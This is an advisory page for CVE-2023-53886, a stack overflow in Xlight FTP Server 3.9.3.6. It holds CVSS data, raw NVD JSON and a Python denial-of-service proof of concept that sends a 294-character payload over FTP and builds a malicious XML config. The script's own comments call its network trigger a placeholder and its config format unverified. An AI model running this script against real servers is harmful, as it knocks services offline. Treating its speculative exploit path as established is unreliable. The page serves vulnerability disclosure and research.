Security Vulnerability Report
CVE-2023-53886 CVSS 7.5 HIGH

CVE-2023-53886

Published: 2025-12-15 21:15:52
Last Modified: 2025-12-18 21:42:34

Description

Xlight FTP Server 3.9.3.6 contains a stack buffer overflow vulnerability in the 'Execute Program' configuration that allows attackers to crash the application. Attackers can trigger the vulnerability by inserting 294 characters into the program execution configuration, causing a denial of service condition.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
(The CVSS 4.0 secondary vector in the raw JSON below rates the same issue 5.1 MEDIUM with AV:L/PR:L/UI:A, i.e. a local trigger through the program execution configuration rather than an unauthenticated network request; the two vectors disagree on attack vector and privileges.)

Configurations (Affected Products)

cpe:2.3:a:xlightftpd:xlight_ftp_server:3.9.3.6:*:*:*:*:*:*:* - VULNERABLE
Xlight FTP Server 3.9.3.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2023-53886 PoC - Xlight FTP Server Stack Buffer Overflow
# This PoC demonstrates the DoS vulnerability in the Execute Program configuration
# Reference: https://www.exploit-db.com/exploits/51665
#
# NOTE(review): the advisory text and the CVSS 4.0 vector on this page
# (AV:L/PR:L/UI:A) place the overflow in the admin-side 'Execute Program'
# configuration input.  Nothing in this script demonstrates that an FTP
# command reaches that buffer; the author's own comments below call the
# network path a placeholder.  Treat a crash of the FTP service as the
# only observable, and expect the script to do nothing against a server
# that simply rejects SITE EXEC.

import socket
import sys


def exploit_cve_2023_53886(target_ip: str, target_port: int = 21) -> bool:
    """
    Exploit for CVE-2023-53886 - Xlight FTP Server Stack Buffer Overflow

    The vulnerability exists in the 'Execute Program' configuration feature.
    Sending a payload of approximately 294 characters causes a stack buffer
    overflow, leading to application crash (DoS).

    Args:
        target_ip: Target Xlight FTP Server IP address
        target_port: FTP control port (default: 21)

    Returns:
        bool: True if exploit sent successfully, False otherwise

    Side effects:
        Writes progress lines to stdout.  The socket is closed explicitly only
        on the success path; when an exception is raised the function returns
        False without closing it (no ``with``/``finally``), so the descriptor
        is released by garbage collection.

    Raises:
        Nothing: ``socket.error`` and every other ``Exception`` are caught,
        logged to stdout and turned into a ``False`` return.
    """
    try:
        # Create socket connection
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)  # applies to connect() and every recv()/send() below
        sock.connect((target_ip, target_port))
        print(f"[*] Connected to {target_ip}:{target_port}")

        # Receive FTP banner
        # decode() is strict UTF-8: a banner with other bytes raises
        # UnicodeDecodeError, which the generic except below reports as an error.
        banner = sock.recv(1024)
        print(f"[*] Banner: {banner.decode().strip()}")

        # The vulnerable payload - 294 'A' characters
        # This overflows the stack buffer in Execute Program configuration
        payload = "A" * 294

        # Method 1: Login and trigger via SITE command (if supported)
        # Most FTP servers require authentication for SITE commands

        # Login
        # send() may transmit fewer bytes than requested; the return value is
        # not checked anywhere in this function.
        sock.send(b"USER anonymous\r\n")
        response = sock.recv(1024)
        print(f"[*] USER response: {response.decode().strip()}")

        # NOTE(review): "[email protected]" looks like an address obfuscated by
        # the page scraper rather than the author's literal - confirm before use.
        # The PASS reply is printed but never inspected, so a rejected login
        # does not stop the script.
        sock.send(b"PASS [email protected]\r\n")
        response = sock.recv(1024)
        print(f"[*] PASS response: {response.decode().strip()}")

        # Try to trigger the vulnerability via raw configuration
        # Note: Actual exploitation may require specific FTP commands or
        # direct manipulation of the configuration file
        print(f"[*] Sending overflow payload ({len(payload)} bytes)...")

        # This is a placeholder - actual exploitation requires
        # identifying the specific command that triggers Execute Program
        # Common approaches:
        # 1. SITE EXEC command (if supported)
        # 2. Direct config file modification
        # 3. Admin interface exploitation

        # Example: If SITE EXEC is supported
        # The server's reply to SITE EXEC is never read, so "Sent" does not
        # mean "accepted".  The bare except swallows every exception
        # (including KeyboardInterrupt) and the raw send below runs regardless.
        try:
            site_exec_cmd = f"SITE EXEC {payload}\r\n"
            sock.send(site_exec_cmd.encode())
            print(f"[*] Sent: SITE EXEC command with payload")
        except:
            pass

        # Alternative: Send raw data that might trigger the overflow
        # Sent without CRLF, i.e. outside any FTP command framing; from the
        # server's view this is an unterminated command line.
        sock.send(payload.encode())
        print(f"[*] Payload sent")

        sock.close()
        # "should crash" is the author's expectation; the function does not
        # verify it (no reconnect or reply check after the sends).
        print("[*] Exploit sent. Target should crash if vulnerable.")
        return True

    except socket.error as e:
        print(f"[!] Socket error: {e}")
        return False
    except Exception as e:
        print(f"[!] Error: {e}")
        return False


def create_config_exploit() -> str:
    """
    Alternative method: Generate malicious config file content
    that can be used to trigger the vulnerability

    Returns:
        str: an XML document embedding the 294-character payload in the
        ``<Arguments>`` element.  The document is only built and returned;
        nothing is written to disk, and ``__main__`` never calls this function.

    NOTE(review): the element names here are the author's template.  Nothing
    on this page shows Xlight's real configuration file format or which field
    feeds the overflowing buffer, so treat the shape as unverified.
    """
    payload = "A" * 294

    # Xlight FTP Server config file exploit template
    # Doubled backslashes are needed inside the f-string so the path is
    # emitted with single backslashes.
    config_content = f"""<?xml version="1.0"?>
<Configuration>
  <ExecuteProgram>
    <Enabled>true</Enabled>
    <ProgramPath>C:\\Windows\\System32\\cmd.exe</ProgramPath>
    <Arguments>/c {payload}</Arguments>
  </ExecuteProgram>
</Configuration>"""

    return config_content


if __name__ == "__main__":
    # Usage: one positional target address, optional port.
    if len(sys.argv) < 2:
        print("Usage: python cve_2023_53886.py <target_ip> [port]")
        print("Example: python cve_2023_53886.py 192.168.1.100 21")
        sys.exit(1)

    target = sys.argv[1]
    # int() raises ValueError on a non-numeric port; it is not caught here.
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 21

    print("=" * 60)
    print("CVE-2023-53886 - Xlight FTP Server Stack Buffer Overflow")
    print("=" * 60)

    # Return value is discarded, so the exit status is 0 whether or not the
    # connection or the sends succeeded.
    exploit_cve_2023_53886(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53886", "sourceIdentifier": "[email protected]", "published": "2025-12-15T21:15:51.690", "lastModified": "2025-12-18T21:42:33.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Xlight FTP Server 3.9.3.6 contains a stack buffer overflow vulnerability in the 'Execute Program' configuration that allows attackers to crash the application. Attackers can trigger the vulnerability by inserting 294 characters into the program execution configuration, causing a denial of service condition."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xlightftpd:xlight_ftp_server:3.9.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "B93370A0-D025-4000-932C-C41E3CE37071"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51665", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/xlight-ftp-server-stack-buffer-overflow-vulnerability-via-execute-program", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.xlightftpd.com/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51665", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}